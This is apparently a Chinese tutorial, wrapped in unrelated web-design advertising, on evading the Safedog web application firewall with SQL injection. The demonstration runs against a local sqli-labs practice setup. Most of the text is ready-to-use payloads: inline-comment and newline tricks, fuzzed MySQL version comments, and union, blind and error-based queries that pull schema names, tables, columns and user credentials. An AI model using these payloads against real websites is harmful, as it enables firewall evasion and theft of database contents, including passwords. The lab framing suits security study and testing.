符合中小企业对网站设计、功能常规化式的企业展示型网站建设
本套餐主要针对企业品牌型网站、中高端设计、前端互动体验...
商城网站建设因基本功能的需求不同费用上面也有很大的差别...
手机微信网站开发、微信官网、微信商城网站...
这篇文章将为大家详细讲解有关Sql注入bypass的示例分析,小编觉得挺实用的,因此分享给大家做个参考,希望大家阅读完这篇文章后可以有所收获。
在若羌等地区,都构建了全面的区域性战略布局,加强发展的系统性、市场前瞻性、产品创新能力,以专注、极致的服务理念,为客户提供网站设计制作、网站设计 网站设计制作按需设计,公司网站建设,企业网站建设,成都品牌网站建设,全网营销推广,成都外贸网站制作,若羌网站建设费用合理。
waf是通过使用一组规则来区分正常请求和恶意请求的。例如:安全狗、云锁、D盾等。
绕过:既然是存在规则匹配,那么就可以想方法绕过规则匹配。比如常见的黑名单限制,黑名单模型使用预设
win7
phpstdy(MySQL:5.7.0 php:5.3.29)
网站apache安全狗(4.0.28330.0)
sqlilabs靶场
将防护等级调到最高级:
and 1=1 绕过
首先,尝试' and 1=1和' or 1=1
都会被防火墙拦截。 尝试替换and和or关键字:替换成&&, ||
还是被狗拦截掉了。那么就要想办法把1=1入手,要么将1=1换掉,要么使用尝试内联注释。首先,含是使用and或者or,
将1=1改成负数-1=-1
可以看到成功绕过,说明安全狗没有对负数进行检测。
接着尝试内联注释:
/*%"!*/and/*%"!*/1=1--+ --拦截 /*%!%22/*/and/*%!%22/*/1=1--+ --不拦截
order by 绕过:
就使用内联注释
/*%!%22/*/order/*%!%22/*/by+3--+ --不拦截 order%23%0Aby 3--+ --不拦截,当发现%23注释之后,不会再去检查了,所以就利用单行注释和换行来绕过
一般的安全狗对order by 查询中间添加一些无用的数据不会拦截。
union select 绕过
内联注入:
union /*!10440select*/ 1,2,3
当然也可以fuzz中间的版本号:0440 – 10449 11440-11449 12440-12449 13440-13449 14400-14499 15440-15449 16440-16449 17440-17449 18440-18449 19440-19449都可以。
注:MySQL数据库为了保持与其他数据库兼容,特意新添加的功能。 为了避免从MySQL中导出的SQL语句不能被其他数据库使用,它把一些 MySQL特有的语句放在 /! .../ 中,这些语句在不兼容的数据库中使用时便 不会执行。而MySQL自身却能识别、执行。 /50001/表示数据库版本>=5.00.01时中间的语句才会执行。
第二种方法:注释绕过
union %23%0aall select ——union 注释+换行 all select(做出多次查询)
函数的注入
采用的办法内联注释:
union /*!10440select*/ 1,hex(user/**/()),3 union /*!10440select*/ 1,hex(database/**/()),3 union /*!10440select*/ 1,hex(@@version/**/()),3 union /*!10440select*/ 1,hex(@@datadir),3
另一种方法:
?/*&id=-1'union select 1,user(),3 --+*/
这里就是--+注释符把后面的/形成了一个完整的sql语句。
对于information_schema是没有进行检测的,所以只要保证前面的union和select绕过就可以。
1:
?id=-1'union /*!10440select*/ 1,group_concat(schema_name),3 from information_schema.schemata--+
2:
?/*&id=-1'union select 1,group_concat(schema_name),3 from information_schema.schemata--+*/
?/*&id=-1'union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' and table_schema='security'--+*/ ?/*&id=-1'union select 1,username,password from users where id='3'--+*/
那么通过这两种方法,就能得到数据库的表,列命和字段内容。
盲注
1.时间盲注:
利用方法:内联注释
?/*&id=1' and if(ascii(substr(database(),1,1))=115,sleep(3),1)--+*/ ?/*&id=1%27%20and%20if(ascii(substr(database/**/(),1,1))=115,sleep/**/(3),1)--+*/ ?/*&id=1' and if(ascii(substr(database(/*!*/),1,1))=115,sleep(/*!3*/),1)--+*/ ?id=1' /*!10440and*/ if(ascii(substr(database/**/(),1,1))=115,sleep/**/(4),1)--+
利用方法:if 前面添加!~ -
?id=1' and !if(ascii(substr(database/**/(),1,1))=115,sleep/**/(3),1)--+ ?id=1' and ~if(ascii(substr(database/**/(),1,1))=115,sleep/**/(3),1)--+ ?id=1' and -if(ascii(substr(database/**/(),1,1))=115,sleep/**/(3),1)--+
bool盲注
盲注方法:内联注释
?id=1' /*!10440and*/length(database/**/())=8--+ ?/*&id=1' and left(database/**/(),1)='s'--+ ?/*&id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database/**/() limit 0,1),1,1))=101--+ ?/*&id=1%27%20and%20ord(mid((select%20ifnull(cast(username%20as%20char),0x20)%20from%20security.users%20order%23%0Aby%20id%20limit%200,1),1,1))=68--+
报错注入
来绕过报错注入中常用的两个函数updatexml()和extractvalue()函数
利用方法:注释+换行。
?/*&id=1%27%20and%20extractvalue%23%0A(1,concat(0x7e,(/*!10440select*/database/**/()),0x7e))--+ ?id=1%27%20and%20extractvalue%23%0A(1,concat(0x7e,(/*!10440select*/version()),0x7e))--+
爆表:
?/*&id=1%27%20and%20extractvalue%23%0A(1,concat(0x7e,(select%20group_concat(table_name)from%23%0ainformation_schema.tables%23%0awhere%20table_schema=%27security%27),0x7e))--+*/ ?id=1%27%20and%20extractvalue%23%0A(1,concat(0x7e,(select%20group_concat(table_name)from%23%0ainformation_schema.tables%23%0awhere%20table_schema=0x7365637572697479),0x7e))--+
爆列名更上面的一样。那么爆字段内容不能直接select username from users limit 1而是在from后面再写一个注释换行。
?id=1%27%20and%20extractvalue%23%0A(1,concat(0x7e,(select%20username%20from%23%0ausers%20limit%201),0x7e))--+
关于“Sql注入bypass的示例分析”这篇文章就分享到这里了,希望以上内容可以对大家有一定的帮助,使各位可以学到更多知识,如果觉得文章不错,请把它分享出去让更多的人看到。